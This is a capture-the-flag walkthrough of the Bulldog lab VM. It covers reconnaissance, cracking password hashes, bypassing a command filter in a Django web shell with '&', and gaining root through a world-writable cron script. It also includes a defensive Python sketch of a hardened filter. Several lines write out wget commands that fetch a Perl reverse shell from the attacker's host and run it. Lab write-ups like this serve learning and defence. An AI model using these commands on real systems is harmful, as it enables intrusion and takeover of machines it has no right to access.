Created by Nick Frichette
Software used: nmap, dirbuster, netcat
Nmap showed SSH running on the typical telnet port and two Python-based HTTP servers on ports 80 and 8080.
Visiting the web server on port 80 gave nothing of value. Running dirbuster against it revealed a few interesting directories.
The /dev/ directory showed a page and a link to a strange, non-functioning site.
The source of the page showed a couple of possible usernames (the part before each @) and an MD5 hash for each user. Searching Google for each hash showed that the hashed word for nick was “bulldog”.
/admin/ was a Django login page. Logging in with the username nick and the password “bulldog” worked.
The actual site didn’t have any functionality.
Looking around further and visiting the web-shell link on “/dev/” again showed that the web-shell page had changed. It now featured a basic web shell with a few commands and a textarea for the output. Trying to chain two commands with “;” didn’t work. Browsing around the filesystem showed the source of the Django application in the file “views.py”.
From the source I could see that the program wasn’t guarded against “&”. As long as an allowed command appeared in the command line and no “;” was present, anything else could be appended after a “&”.
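As an added example (not code from the Bulldog VM or this writeup), here is a Python sketch of the kind of filter described above, which only rejects “;” and accepts any line containing an allowed command, next to a hardened version that tokenizes the line with shlex, requires the first token to match the allowlist exactly, rejects shell metacharacters, and runs the result without a shell. The allowlist contents and the sample command lines are assumptions.

```python
import shlex
import subprocess
from typing import List, Optional

# Assumed allowlist; the real views.py is not reproduced on this page.
ALLOWED = {"ifconfig", "ls", "echo", "pwd", "cat", "rm"}


def weak_filter(cmdline: str) -> bool:
    """Filter of the kind the writeup describes: accept when an allowed
    command appears anywhere in the string and no ';' is present.
    A '&' (or '|', backticks, '$()') passes straight through."""
    if ";" in cmdline:
        return False
    return any(cmd in cmdline for cmd in ALLOWED)


def strict_filter(cmdline: str) -> Optional[List[str]]:
    """Hardened check: split like a shell would, require argv[0] to be an
    exact allowlist match, and reject any token carrying shell
    metacharacters. Returns argv on success, None on rejection."""
    try:
        argv = shlex.split(cmdline)
    except ValueError:  # unbalanced quotes etc.
        return None
    if not argv or argv[0] not in ALLOWED:
        return None
    if any(any(ch in tok for ch in "&|;`$<>(){}\n") for tok in argv):
        return None
    return argv


def run_safely(cmdline: str) -> Optional[str]:
    """Run the validated argv directly (no shell), so no operator in the
    input can ever be interpreted by /bin/sh."""
    argv = strict_filter(cmdline)
    if argv is None:
        return None
    proc = subprocess.run(argv, capture_output=True, text=True, timeout=5)
    return proc.stdout


if __name__ == "__main__":
    # Constructed sample inputs; 198.51.100.1 is a documentation address.
    chained = "ls & wget http://198.51.100.1:8000/x.pl -O /tmp/x.pl"
    print("weak filter accepts chained line:", weak_filter(chained))   # True
    print("strict filter accepts chained line:", strict_filter(chained))  # None
    print("strict filter on 'echo hello':", strict_filter("echo hello"))
```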
So the easy route was to wget a reverse shell and run it. First I needed a Python HTTP server to serve a Perl reverse shell. I then ran “ls & wget http://192.168.1.38:8000/perl-reverse-shell.pl -O /home/django” in the web shell, and then “ls & perl /home/django/perl-reverse-shell.pl” to connect to an already running netcat listener on my workstation.
And we got a shell, this time running as the user “django”.
Looking for a way to escalate privileges, I found the cron job in /etc/cron.d/runAV, which ran a Python script every minute as root. The script didn’t do anything, and its permissions allowed it to be edited by everyone.
So I imported the Python os module for the os.system function to run a command, then added a line that would execute a new reverse shell I had already fetched with wget.
After a minute my new netcat session received a connection from the new reverse shell. This time I had root and was able to read the flag.